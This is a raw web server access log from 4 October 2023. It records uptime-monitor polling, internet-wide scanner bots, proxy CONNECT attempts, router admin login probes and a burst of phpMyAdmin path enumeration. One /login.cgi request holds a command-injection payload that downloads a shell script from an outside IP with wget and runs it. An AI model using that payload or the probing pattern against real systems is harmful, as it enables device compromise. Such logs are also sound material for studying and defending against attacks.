212.91.246.72 - - [04/Oct/2023:08:54:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:55:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.10 - - [04/Oct/2023:08:55:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.35.18.31 - - [04/Oct/2023:08:56:39 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2023:08:56:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:57:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:58:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:59:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:00:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:01:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:02:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:03:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:04:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:06:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.78.6.216 - - [04/Oct/2023:09:07:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [04/Oct/2023:09:07:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:08:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:09:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:10:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.243.138.50 - - [04/Oct/2023:09:11:28 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.138.50 - - [04/Oct/2023:09:11:28 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.138.50 - - [04/Oct/2023:09:11:39 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2023:09:11:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.243.138.50 - - [04/Oct/2023:09:11:48 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.138.50 - - [04/Oct/2023:09:12:01 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.138.50 - - [04/Oct/2023:09:12:04 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.138.50 - - [04/Oct/2023:09:12:31 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.138.50 - - [04/Oct/2023:09:12:34 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.138.50 - - [04/Oct/2023:09:12:38 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2023:09:12:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.243.138.50 - - [04/Oct/2023:09:12:53 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2023:09:13:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.35.18.187 - - [04/Oct/2023:09:14:40 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Oct/2023:09:14:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:15:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.76.96.55 - - [04/Oct/2023:09:16:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [04/Oct/2023:09:16:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.167.144.238 - - [04/Oct/2023:09:16:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:09:17:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:18:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:19:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [04/Oct/2023:09:19:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [04/Oct/2023:09:20:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:21:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.3 - - [04/Oct/2023:09:22:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:09:22:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:23:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.140.130.61 - - [04/Oct/2023:09:23:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
198.235.24.36 - - [04/Oct/2023:09:23:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
34.78.6.216 - - [04/Oct/2023:09:23:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [04/Oct/2023:09:24:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:25:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:26:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:27:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:29:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:30:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.38 - - [04/Oct/2023:09:30:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.76.158.233 - - [04/Oct/2023:09:31:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [04/Oct/2023:09:31:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.35.18.187 - - [04/Oct/2023:09:32:35 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Oct/2023:09:32:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.49 - - [04/Oct/2023:09:33:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.49 - - [04/Oct/2023:09:33:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.49 - - [04/Oct/2023:09:33:25 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.49 - - [04/Oct/2023:09:33:25 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Oct/2023:09:33:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:34:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:35:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:38:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:39:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:40:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.107.166.15 - - [04/Oct/2023:09:40:53 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:09:40:55 +0200] "\x03" 501 316 "-" "-"
193.35.18.187 - - [04/Oct/2023:09:41:05 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Oct/2023:09:41:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.107.166.15 - - [04/Oct/2023:09:42:30 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [04/Oct/2023:09:42:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.67 - - [04/Oct/2023:09:43:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
65.49.1.107 - - [04/Oct/2023:09:43:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:09:43:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:44:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.67 - - [04/Oct/2023:09:45:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0"
65.49.1.98 - - [04/Oct/2023:09:45:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
65.49.1.95 - - [04/Oct/2023:09:45:41 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:09:45:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.67 - - [04/Oct/2023:09:45:46 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
200.141.228.34 - - [04/Oct/2023:09:46:33 +0200] "GET /login.cgi?cli=aa%20aa%27cd%20/tmp;wget%20http://194.180.48.100/l.sh;chmod%20777%20l.sh%20sh%20/tmp/%27$l.sh HTTP/1.1" 400 329 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
212.91.246.72 - - [04/Oct/2023:09:46:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:09:47:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.35.18.31 - - [04/Oct/2023:09:48:11 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2023:09:48:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [04/Oct/2023:09:49:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
185.170.144.3 - - [04/Oct/2023:09:49:21 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [04/Oct/2023:09:49:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
200.93.19.182 - - [04/Oct/2023:09:49:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:25 +0200] "GET /phpMyAdmin3/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:25 +0200] "GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:25 +0200] "GET /dbadmin/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /sql/sql/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /phpMyAdmin5.2/index.php?lang=en HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /1phpmyadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /mysql/db/index.php?lang=en HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /db/webdb/index.php?lang=en HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /sql/sqlweb/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /program/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /phpMyAdmin-5.3.0/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /__phpmyadmin/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /admin/pma/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /phpmy-admin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /phpmyAdmin/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /2phpmyadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /mysql/web/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /phpmyadmin2013/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:26 +0200] "GET /phpMyAdmin-latest-all-languages/index.php?lang=en HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /phpmyadmin4/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /phpmyadmin2017/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /sql/sql-admin/index.php?lang=en HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /db/dbweb/index.php?lang=en HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /wpma5.2/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /admin/db/index.php?lang=en HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /sqlmanager/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /phpMyAdmin-latest-english/index.php?lang=en HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
